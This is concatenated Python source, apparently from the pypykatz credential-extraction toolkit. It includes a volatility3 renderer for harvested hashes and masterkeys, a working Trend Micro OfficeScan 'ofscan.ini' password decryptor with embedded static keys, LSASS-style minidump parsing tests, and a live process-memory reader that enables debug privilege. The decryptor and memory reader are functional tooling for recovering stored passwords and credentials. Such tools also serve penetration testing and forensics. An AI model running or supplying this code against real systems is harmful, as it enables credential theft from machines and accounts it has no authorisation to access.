			t = cred.to_dict()
			x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
			yield 0, x

def vol3_treegrid(mimi):
	return renderers.TreeGrid([
			("credtype", str),
			("domainname", str),
			("username", str),
			("NThash", str),
			("LMHash", str),
			("SHAHash", str),
			("masterkey", str),
			("masterkey(sha1)", str),
			("key_guid", str),
			("password", str),         
		], vol3_generator(mimi))



# Python implementation of the Trend Micro Password Decryptor
# This script decrypts encrypted passwords stored in the TrendMicro OfficeScan "odscan.ini" file
#
# original code from https://aluigi.altervista.org/pwdrec.htm#trendmicropwd
# original code was developed by Luigi Auriemma in the year of 2008
#
# This script was ported to Python by Tamas Jos @skelsec
#
# TODO: the script is missing the trendmicro_PWDDecrypt function, which doesn't seem to be in use anymore


from unicrypto.symmetric import AES, cipherMODE
import array
import os
import re

def trendmicro_build_key(pwd1, pwd2):
    o = [513,1027,1541,2055]
    pwd1 = [x for x in pwd1]
    pwd2 = [x for x in pwd2]
    idxa = 0
    idxb = 0

    a = pwd1[idxa]
    b = pwd2[idxb]

    x = 0x7f3b
    for i in range(4):
        if a == 0 and b == 0:
            break
        x ^= ((a | (b << 8)) ^ 0x6b2c) & 0xffff
        t = i
        if i==1:
            t = 2
        elif i==2:
            t = 1
        
        o[t] ^= (x & 0xffff)
        
        idxa += 1
        idxb += 1
        if idxa >= len(pwd1):
            a = 0
        else:
            a = pwd1[idxa]
        if idxb >= len(pwd2):
            b = 0
        else:
            b = pwd2[idxb]

    return b''.join([int.to_bytes(x, 2, byteorder='little', signed=False) for x in o]) 

def trendmicro_crypt(encdata:str):
    multistr = 0
    results = []
    while len(encdata) > 0:
        multistr += 1
        tablex = [0] * 768
        if encdata[0] == '!':
            encdata = encdata[1:]
        blocks = int(encdata[0])
        blocklen = bytes.fromhex(encdata[1:3])[0]
        encdata = encdata[3:]

        key = trendmicro_build_key(b"Windows7621673NT", b"Virus3761267Trend")
        res = ''
        tablex = trendmicro_crypt1(tablex, key)
        for i in range(blocks):
            i =i*16
            blockdata = bytes.fromhex(encdata[i:i+16])
            res += trendmicro_crypt2(tablex, blockdata)
        
        res = res[:blocklen]
        encdata = encdata[blocks*16:]
        rescrc = int.from_bytes(bytes.fromhex(encdata[:8]), byteorder='big', signed=False)
        encdata = encdata[8:]
        
        # crc is taken over all 4 byte aligned blocks (not the last block if it's not aligned)
        crcblocklen = (blocklen//4)*4
        crc = 0x4f627a3b
        x = array.array('I', res.encode()[:crcblocklen])
        for c in x:
            crc = (crc ^ c) & 0xffffffff
        
        if crc != rescrc:
            res = '!!!CRC MISMATCH!!!' + res

        if multistr == 1:
            res = res[3:]
        results.append(res)
    return ''.join(results)

def trendmicro_crypt2(tablex, blockdata, encdec:bool=False):
    table1 = b"\x07\x02\x06\x02\x05\x02\x04\x02\x03\x02\x02\x02\x01\x02\x00\x02" +\
        b"\x07\x08\x06\x08\x05\x08\x04\x08\x03\x08\x02\x08\x01\x08\x00\x08" +\
        b"\x07\x20\x06\x20\x05\x20\x04\x20\x03\x20\x02\x20\x01\x20\x00\x20" +\
        b"\x07\x80\x06\x80\x05\x80\x04\x80\x03\x80\x02\x80\x01\x80\x00\x80" +\
        b"\x07\x01\x06\x01\x05\x01\x04\x01\x03\x01\x02\x01\x01\x01\x00\x01" +\
        b"\x07\x04\x06\x04\x05\x04\x04\x04\x03\x04\x02\x04\x01\x04\x00\x04" +\
        b"\x07\x10\x06\x10\x05\x10\x04\x10\x03\x10\x02\x10\x01\x10\x00\x10" +\
        b"\x07\x40\x06\x40\x05\x40\x04\x40\x03\x40\x02\x40\x01\x40\x00\x40"
    table2 = b"\x1f\x00\x01\x02\x03\x04\x03\x04\x05\x06\x07\x08\x07\x08\x09\x0a" +\
        b"\x0b\x0c\x0b\x0c\x0d\x0e\x0f\x10\x0f\x10\x11\x12\x13\x14\x13\x14" +\
        b"\x15\x16\x17\x18\x17\x18\x19\x1a\x1b\x1c\x1b\x1c\x1d\x1e\x1f\x00"
    table3 = b"\x0e\x04\x0d\x01\x02\x0f\x0b\x08\x03\x0a\x06\x0c\x05\x09\x00\x07" +\
        b"\x00\x0f\x07\x04\x0e\x02\x0d\x01\x0a\x06\x0c\x0b\x09\x05\x03\x08" +\
        b"\x04\x01\x0e\x08\x0d\x06\x02\x0b\x0f\x0c\x09\x07\x03\x0a\x05\x00" +\
        b"\x0f\x0c\x08\x02\x04\x09\x01\x07\x05\x0b\x03\x0e\x0a\x00\x06\x0d" +\
        b"\x0f\x01\x08\x0e\x06\x0b\x03\x04\x09\x07\x02\x0d\x0c\x00\x05\x0a" +\
        b"\x03\x0d\x04\x07\x0f\x02\x08\x0e\x0c\x00\x01\x0a\x06\x09\x0b\x05" +\
        b"\x00\x0e\x07\x0b\x0a\x04\x0d\x01\x05\x08\x0c\x06\x09\x03\x02\x0f" +\
        b"\x0d\x08\x0a\x01\x03\x0f\x04\x02\x0b\x06\x07\x0c\x00\x05\x0e\x09" +\
        b"\x0a\x00\x09\x0e\x06\x03\x0f\x05\x01\x0d\x0c\x07\x0b\x04\x02\x08" +\
        b"\x0d\x07\x00\x09\x03\x04\x06\x0a\x02\x08\x05\x0e\x0c\x0b\x0f\x01" +\
        b"\x0d\x06\x04\x09\x08\x0f\x03\x00\x0b\x01\x02\x0c\x05\x0a\x0e\x07" +\
        b"\x01\x0a\x0d\x00\x06\x09\x08\x07\x04\x0f\x0e\x03\x0b\x05\x02\x0c" +\
        b"\x07\x0d\x0e\x03\x00\x06\x09\x0a\x01\x02\x08\x05\x0b\x0c\x04\x0f" +\
        b"\x0d\x08\x0b\x05\x06\x0f\x00\x03\x04\x07\x02\x0c\x01\x0a\x0e\x09" +\
        b"\x0a\x06\x09\x00\x0c\x0b\x07\x0d\x0f\x01\x03\x0e\x05\x02\x08\x04" +\
        b"\x03\x0f\x00\x06\x0a\x01\x0d\x08\x09\x04\x05\x0b\x0c\x07\x02\x0e" +\
        b"\x02\x0c\x04\x01\x07\x0a\x0b\x06\x08\x05\x03\x0f\x0d\x00\x0e\x09" +\
        b"\x0e\x0b\x02\x0c\x04\x07\x0d\x01\x05\x00\x0f\x0a\x03\x09\x08\x06" +\
        b"\x04\x02\x01\x0b\x0a\x0d\x07\x08\x0f\x09\x0c\x05\x06\x03\x00\x0e" +\
        b"\x0b\x08\x0c\x07\x01\x0e\x02\x0d\x06\x0f\x00\x09\x0a\x04\x05\x03" +\
        b"\x0c\x01\x0a\x0f\x09\x02\x06\x08\x00\x0d\x03\x04\x0e\x07\x05\x0b" +\
        b"\x0a\x0f\x04\x02\x07\x0c\x09\x05\x06\x01\x0d\x0e\x00\x0b\x03\x08" +\
        b"\x09\x0e\x0f\x05\x02\x08\x0c\x03\x07\x00\x04\x0a\x01\x0d\x0b\x06" +\
        b"\x04\x03\x02\x0c\x09\x05\x0f\x0a\x0b\x0e\x01\x07\x06\x00\x08\x0d" +\
        b"\x04\x0b\x02\x0e\x0f\x00\x08\x0d\x03\x0c\x09\x07\x05\x0a\x06\x01" +\
        b"\x0d\x00\x0b\x07\x04\x09\x01\x0a\x0e\x03\x05\x0c\x02\x0f\x08\x06" +\
        b"\x01\x04\x0b\x0d\x0c\x03\x07\x0e\x0a\x0f\x06\x08\x00\x05\x09\x02" +\
        b"\x06\x0b\x0d\x08\x01\x04\x0a\x07\x09\x05\x00\x0f\x0e\x02\x03\x0c" +\
        b"\x0d\x02\x08\x04\x06\x0f\x0b\x01\x0a\x09\x03\x0e\x05\x00\x0c\x07" +\
        b"\x01\x0f\x0d\x08\x0a\x03\x07\x04\x0c\x05\x06\x0b\x00\x0e\x09\x02" +\
        b"\x07\x0b\x04\x01\x09\x0c\x0e\x02\x00\x06\x0a\x0d\x0f\x03\x05\x08" +\
        b"\x02\x01\x0e\x07\x04\x0a\x08\x0d\x0f\x0c\x09\x00\x03\x05\x06\x0b"
    table4 = b"\x0f\x06\x13\x14\x1c\x0b\x1b\x10\x00\x0e\x16\x19\x04\x11\x1e\x09" +\
        b"\x01\x07\x17\x0d\x1f\x1a\x02\x08\x12\x0c\x1d\x05\x15\x0a\x03\x18"
    table5 = b"\x27\x07\x2f\x0f\x37\x17\x3f\x1f\x26\x06\x2e\x0e\x36\x16\x3e\x1e" +\
        b"\x25\x05\x2d\x0d\x35\x15\x3d\x1d\x24\x04\x2c\x0c\x34\x14\x3c\x1c" +\
        b"\x23\x03\x2b\x0b\x33\x13\x3b\x1b\x22\x02\x2a\x0a\x32\x12\x3a\x1a" +\
        b"\x21\x01\x29\x09\x31\x11\x39\x19\x20\x00\x28\x08\x30\x10\x38\x18"

    tmp = [0] * 0x60
    tmp2 = [0] * 0x30
    bck = [0] * 0x20

    for i in range(0x40):
        tmp[i] = 1 if (blockdata[table1[i * 2]] & table1[(i * 2) + 1]) else 0

    
    for i in range(0x10):
        bck = tmp[0x20:0x40]

        if encdec is True:
            t = i
        else:
            t = 0xf - i

        for j in range(0x30):
            tmp2[j] = tmp[0x20 + table2[j]] ^ tablex[(t * 0x30) + j]

        
        for j in range(8):
            t = j*6
            c = (tmp2[t] << 5) | (tmp2[t + 1] << 3) | (tmp2[t + 2] << 2) | (tmp2[t + 3] << 1) | tmp2[t + 4] | (tmp2[t + 5] << 4)
            c = table3[(j << 6) + c]
            t = j << 2
            tmp[0x40 + t] = (c >> 3) & 1
            tmp[0x41 + t] = (c >> 2) & 1
            tmp[0x42 + t] = (c >> 1) & 1
            tmp[0x43 + t] = c & 1
        
        
        for j in range(0x20):
            tmp[0x20 + j] = tmp[j] ^ tmp[0x40 + table4[j]]
        
        tmp = bck + tmp[0x20:]
    
    
    bck = tmp[0x20:0x40]
    tmp = tmp[:0x20] + tmp[:0x20] + tmp[0x40:]
    tmp = bck + tmp[0x20:]

    tdata = [x for x in blockdata]
    t = 0
    for i in range(8):
        tdata[i] = 0
        j = 1
        while j <= 0x80:
            if tmp[table5[t]]:
                tdata[i] |= j
            t += 1
            j = j*2

    tdata = ''.join(chr(x) for x in tdata)
    return tdata


def trendmicro_crypt1(tablex, key):
    table1 = b"\x07\x01\x06\x01\x05\x01\x04\x01\x03\x01\x02\x01\x01\x01\x00\x01" +\
        b"\x07\x02\x06\x02\x05\x02\x04\x02\x03\x02\x02\x02\x01\x02\x00\x02" +\
        b"\x07\x04\x06\x04\x05\x04\x04\x04\x03\x04\x02\x04\x01\x04\x00\x04" +\
        b"\x07\x08\x06\x08\x05\x08\x04\x08\x07\x40\x06\x40\x05\x40\x04\x40" +\
        b"\x03\x40\x02\x40\x01\x40\x00\x40\x07\x20\x06\x20\x05\x20\x04\x20" +\
        b"\x03\x20\x02\x20\x01\x20\x00\x20\x07\x10\x06\x10\x05\x10\x04\x10" +\
        b"\x03\x10\x02\x10\x01\x10\x00\x10\x03\x08\x02\x08\x01\x08\x00\x08" 

    table2 = b"\x01\x01\x02\x02\x02\x02\x02\x02\x01\x02\x02\x02\x02\x02\x02\x01"
    table3 = b"\x0d\x10\x0a\x17\x00\x04\x02\x1b\x0e\x05\x14\x09\x16\x12\x0b\x03" +\
        b"\x19\x07\x0f\x06\x1a\x13\x0c\x01\x28\x33\x1e\x24\x2e\x36\x1d\x27" +\
        b"\x32\x2c\x20\x2f\x2b\x30\x26\x37\x21\x34\x2d\x29\x31\x23\x1c\x1f"

    tmp = [0] * 0x38
    for i in range(0x38):
        kl = key[table1[i * 2]]
        tl = table1[(i * 2) + 1]
        kt = kl & tl
        tmp[i] = 1 if kt else 0

    c = 0
    for i in range(0x10):
        c += table2[i]
        for j in range(0x30):
            t = table3[j]
            if t < 0x1C:
                r = 0
            else:
                r = 0x1C
                t -= 0x1C
            t += c
            if t >= 0x1C:
                t -= 0x1C
            t += r
            tablex[(i * 0x30) + j] = tmp[t]
    return tablex
    
def trendmicro_cryptex(encdata:str):
    # static AES key and IV
    # security is top notch
    key = b"\xeb\x06\xe9\xc7\x6c\x16\x1d\x6c\x89\x70\x3d\xfc\x72\x53\xff\xdd\x71\xad\x07\xbf\x12\xf4\xa2\xe7\xa0\x89\xfc\x7c\xa6\xca\x4b\x73"
    iv = b"\x15\x69\x2e\xfc\x39\x89\x4a\xba\x9b\x62\xce\x66\xc9\x05\x12\xae"

    dec = AES(key, cipherMODE.CBC, iv).decrypt(bytes.fromhex(encdata))
    # remove pkcs1 padding from decrypted data
    dec = dec[:-dec[-1]]
    return dec[3:].decode('utf-8')

def trendmicro_decrypt(encdata:str):
    if encdata.startswith('!CRYPT!') is True:
        return trendmicro_crypt(encdata[7:])
    if encdata.startswith('!CRYPTEX!') is True:
        return trendmicro_cryptex(encdata[9:])
    if encdata.startswith('!CRYPTEX3!') is True:
        return trendmicro_cryptex(encdata[10:])
    if encdata.startswith('!CRYPTNG!') is True:
        return 'Decrypting CRYPTNG is not supported'

def parse_ofscan_ini_file(filepath):
    pattern = re.compile(r'^([^=]+?)=((!CRYPTEX!|!CRYPT!|!CRYPTEX3!|!CRYPTNG!)[^=]+?)$')
    result = []
    with open(filepath, 'r') as f:
        for line in f:
            line = line.strip()
            if line == '':
                continue
            match = pattern.match(line)
            if match:
                result.append((match.group(1), match.group(2)))
        return result

def ofscan_decrypt_data(filepath_or_data):
    if os.path.isfile(filepath_or_data):
        lines = parse_ofscan_ini_file(filepath_or_data)
    else:
        lines = ['RESULT:', filepath_or_data]

    results = []
    for line in lines:
        try:
            decdata = trendmicro_decrypt(line[1])
            if decdata is None:
                continue
            results.append((line[0], decdata))
        except Exception as e:
            results.append((line[0], 'Failed to decrypt: %s Reason: %s' % (line[1], e)))
    return results

def main():
    import argparse
    parser = argparse.ArgumentParser(description='Decrypt TrendMicro ofscan.ini file')
    parser.add_argument('filepath', help='ofscan.ini file path or string beginning with !CRYPT! or !CRYPTEX! or !CRYPTEX3!')
    args = parser.parse_args()

    results = ofscan_decrypt_data(args.filepath)
    for result in results:
        print('%s: %s' % (result[0], result[1]))

if __name__ == '__main__':
    main()


import os
from pypykatz.apypykatz import apypykatz
from .config import TESTFILES_DIR, compare_jsons
import pytest


@pytest.mark.asyncio
async def test_x64_win7_7601():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win7')
    with open(os.path.join(basedir, '7601.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '7601.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win7_7601_1():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win7')
    with open(os.path.join(basedir, '7601_1.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '7601_1.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win10_10240():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win10')
    with open(os.path.join(basedir, '10240.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '10240.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win10_10240_2():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win10')
    with open(os.path.join(basedir, '10240_2.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '10240_2.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win10_10240_3():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win10')
    with open(os.path.join(basedir, '10240_3.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '10240_3.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win10_10240_4():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win10')
    with open(os.path.join(basedir, '10240_4.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '10240_4.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win10_15063():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win10')
    with open(os.path.join(basedir, '15063.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '15063.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win10_16299():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win10')
    with open(os.path.join(basedir, '16299.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '16299.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win10_18362():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win10')
    with open(os.path.join(basedir, '18362.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '18362.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win10_19041():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win10')
    with open(os.path.join(basedir, '19041.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '19041.dmp'))
    print(res.to_json())
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win10_19044():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win10')
    with open(os.path.join(basedir, '19044.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '19044.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win81_9600():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win81')
    with open(os.path.join(basedir, '9600.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '9600.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win81_9600_1():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win81')
    with open(os.path.join(basedir, '9600_1.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '9600_1.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2008R2_7601():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2008R2')
    with open(os.path.join(basedir, '7601.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '7601.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2012_9600():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2012')
    with open(os.path.join(basedir, '9600.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '9600.dmp'))
    print(res.to_json())
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2016_14393():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2016')
    with open(os.path.join(basedir, '14393.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '14393.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2016_14393_1():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2016')
    with open(os.path.join(basedir, '14393_1.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '14393_1.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2016_14393_2():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2016')
    with open(os.path.join(basedir, '14393_2.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '14393_2.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2016_14393_3():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2016')
    with open(os.path.join(basedir, '14393_3.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '14393_3.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2019_17763():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2019')
    with open(os.path.join(basedir, '17763.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '17763.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2019_17763_1():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2019')
    with open(os.path.join(basedir, '17763_1.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '17763_1.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2022_20348():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2022')
    with open(os.path.join(basedir, '20348.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '20348.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_win2022_20348_1():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'win2022')
    with open(os.path.join(basedir, '20348_1.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '20348_1.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x64_xp_3790():
    basedir = os.path.join(TESTFILES_DIR, 'x64', 'xp')
    with open(os.path.join(basedir, '3790.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '3790.dmp'))
    print(res.to_json())
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x86_vista_6002():
    basedir = os.path.join(TESTFILES_DIR, 'x86', 'vista')
    with open(os.path.join(basedir, '6002.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '6002.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x86_win7_7601():
    basedir = os.path.join(TESTFILES_DIR, 'x86', 'win7')
    with open(os.path.join(basedir, '7601.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '7601.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x86_win7_7601_1():
    basedir = os.path.join(TESTFILES_DIR, 'x86', 'win7')
    with open(os.path.join(basedir, '7601_1.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '7601_1.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x86_win10_19043():
    basedir = os.path.join(TESTFILES_DIR, 'x86', 'win10')
    with open(os.path.join(basedir, '19043.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '19043.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x86_win10_14393():
    basedir = os.path.join(TESTFILES_DIR, 'x86', 'win10')
    with open(os.path.join(basedir, '14393.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '14393.dmp'))
    assert compare_jsons(res.to_json(), expected)

@pytest.mark.asyncio
async def test_x86_win10_14393_1():
    basedir = os.path.join(TESTFILES_DIR, 'x86', 'win10')
    with open(os.path.join(basedir, '14393_1.json'), 'r') as f:
        expected = f.read()
    res = await apypykatz.parse_minidump_file(os.path.join(basedir, '14393_1.dmp'))
    assert compare_jsons(res.to_json(), expected)

if __name__ == '__main__':
    import asyncio
    asyncio.run(test_x64_xp_3790())


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

from .common.live_reader_ctypes import *
from .common.privileges import enable_debug_privilege
from .common.psapi import *
from .common.version import *
from .common.kernel32 import *
from .common.fileinfo import *
from minidump.streams.SystemInfoStream import PROCESSOR_ARCHITECTURE

from pypykatz import logger
import sys
import copy
import platform
import os
import ntpath
import winreg

class Module:
	def __init__(self):
		self.name = None
		self.baseaddress = None
		self.size = None
		self.endaddress = None
		self.pages = []
		
		self.versioninfo = None
		self.checksum = None
		self.timestamp = None
		
	def inrange(self, addr):
		return self.baseaddress <= addr < self.endaddress
	
	@staticmethod
	def parse(name, module_info, timestamp):
		m = Module()
		m.name = name
		m.baseaddress = module_info.lpBaseOfDll
		m.size = module_info.SizeOfImage
		m.endaddress = m.baseaddress + m.size
		
		m.timestamp = timestamp
		
		return m
		
	def __str__(self):
		return '%s %s %s %s %s' % (self.name, hex(self.baseaddress), hex(self.size), hex(self.endaddress), self.timestamp )
		
class Page:
	def __init__(self):
		self.BaseAddress = None
		self.AllocationBase  = None
		self.AllocationProtect  = None
		self.RegionSize  = None
		self.EndAddress = None
		
		self.data = None
	
	@staticmethod
	def parse(page_info):
		p = Page()
		p.BaseAddress = page_info.BaseAddress
		p.AllocationBase  = page_info.AllocationBase
		p.AllocationProtect  = page_info.AllocationProtect
		p.RegionSize  = min(page_info.RegionSize, 100*1024*1024) # TODO: need this currently to stop infinite search
		p.EndAddress  = page_info.BaseAddress + page_info.RegionSize
		return p
		
	def read_data(self, process_handle):
		self.data = ReadProcessMemory(process_handle, self.BaseAddress, self.RegionSize)
		
	def inrange(self, addr):
		return self.BaseAddress <= addr < self.EndAddress
		
	def search(self, pattern, process_handle):
		if len(pattern) > self.RegionSize:
			return []
		data = ReadProcessMemory(process_handle, self.BaseAddress, self.RegionSize)
		fl = []
		offset = 0
		while len(data) > len(pattern):
			marker = data.find(pattern)
			if marker == -1:
				return fl
			fl.append(marker + offset + self.BaseAddress)
			data = data[marker+1:]
			offset += marker + 1
				
		return fl
	
	def __str__(self):
		return '0x%08x 0x%08x %s 0x%08x' % (self.BaseAddress, self.AllocationBase, self.AllocationProtect, self.RegionSize)

		
class BufferedLiveReader:
	def __init__(self, reader):
		self.reader = reader
		self.pages = []
		
		self.current_segment = None
		self.current_position = None
		
	def _select_segment(self, requested_position):
		"""
		
		"""
		# check if we have semgnet for requested address in cache
		for page in self.pages:
			if page.inrange(requested_position):
				self.current_segment = page
				self.current_position = requested_position
				return
		
		# not in cache, check if it's present in memory space. if yes then create a new buffered memeory object, and copy data
		for page in self.reader.pages:
			if page.inrange(requested_position):
				page.read_data(self.reader.process_handle)
				newsegment = copy.deepcopy(page)
				self.pages.append(newsegment)
				self.current_segment = newsegment
				self.current_position = requested_position
				return
				
		raise Exception('Memory address 0x%08x is not in process memory space' % requested_position)

	def get_reader(self):
		return self.reader

	def seek(self, offset, whence = 0):
		"""
		Changes the current address to an offset of offset. The whence parameter controls from which position should we count the offsets.
		0: beginning of the current memory segment
		1: from current position
		2: from the end of the current memory segment
		If you wish to move out from the segment, use the 'move' function
		"""
		if whence == 0:
			t = self.current_segment.BaseAddress + offset
		elif whence == 1:
			t = self.current_position + offset
		elif whence == 2:
			t = self.current_segment.EndAddress - offset
		else:
			raise Exception('Seek function whence value must be between 0-2')
			
		if not self.current_segment.inrange(t):
			raise Exception('Seek would cross memory segment boundaries (use move)')
		
		self.current_position = t
		return
		
	def move(self, address):
		"""
		Moves the buffer to a virtual address specified by address
		"""
		self._select_segment(address)
		return
		
	def align(self, alignment = None):
		"""
		Repositions the current reader to match architecture alignment
		"""
		if alignment is None:
			if self.reader.processor_architecture == PROCESSOR_ARCHITECTURE.AMD64:
				alignment = 8
			else:
				alignment = 4
		offset = self.current_position % alignment
		if offset == 0:
			return
		offset_to_aligned = (alignment - offset) % alignment
		self.seek(offset_to_aligned, 1)
		return
		
	def tell(self):
		"""
		Returns the current virtual address
		"""
		return self.current_position
		
	def peek(self, length):
		"""
		Returns up to length bytes from the current memory segment
		"""
		t = self.current_position + length
		if not self.current_segment.inrange(t):
			raise Exception('Would read over segment boundaries!')
		return self.current_segment.data[self.current_position - self.current_segment.BaseAddress :t - self.current_segment.BaseAddress]
	
	def read(self, size = -1):
		"""
		Returns data bytes of size size from the current segment. If size is -1 it returns all the remaining data bytes from memory segment
		"""
		if size < -1:
			raise Exception('You shouldnt be doing this')
		if size == -1:
			t = self.current_segment.remaining_len(self.current_position)
			if not t:
				return None
			
			old_new_pos = self.current_position
			self.current_position = self.current_segment.EndAddress
			return self.current_segment.data[old_new_pos - self.current_segment.BaseAddress:]
		
		t = self.current_position + size
		if not self.current_segment.inrange(t):
			raise Exception('Would read over segment boundaries!')
		
		old_new_pos = self.current_position
		self.current_position = t		
		return self.current_segment.data[old_new_pos - self.current_segment.BaseAddress :t - self.current_segment.BaseAddress]
	
	def read_int(self):
		"""
		Reads an integer. The size depends on the architecture. 
		Reads a 4 byte small-endian singed int on 32 bit arch
		Reads an 8 byte small-endian singed int on 64 bit arch
		"""
		if self.reader.processor_architecture == PROCESSOR_ARCHITECTURE.AMD64:
			return int.from_bytes(self.read(8), byteorder = 'little', signed = True)
		else:
			return int.from_bytes(self.read(4), byteorder = 'little', signed = True)
	
	def read_uint(self):
		"""
		Reads an integer. The size depends on the architecture. 
		Reads a 4 byte small-endian unsinged int on 32 bit arch
		Reads an 8 byte small-endian unsinged int on 64 bit arch
		"""
		if self.reader.processor_architecture == PROCESSOR_ARCHITECTURE.AMD64:
			return int.from_bytes(self.read(8), byteorder = 'little', signed = False)
		else:
			return int.from_bytes(self.read(4), byteorder = 'little', signed = False)
	
	def find(self, pattern):
		"""
		Searches for a pattern in the current memory segment
		"""
		pos = self.current_segment.data.find(pattern)
		if pos == -1:
			return -1
		return pos + self.current_position
		
	def find_all(self, pattern):
		"""
		Searches for all occurrences of a pattern in the current memory segment, returns all occurrences as a list
		"""
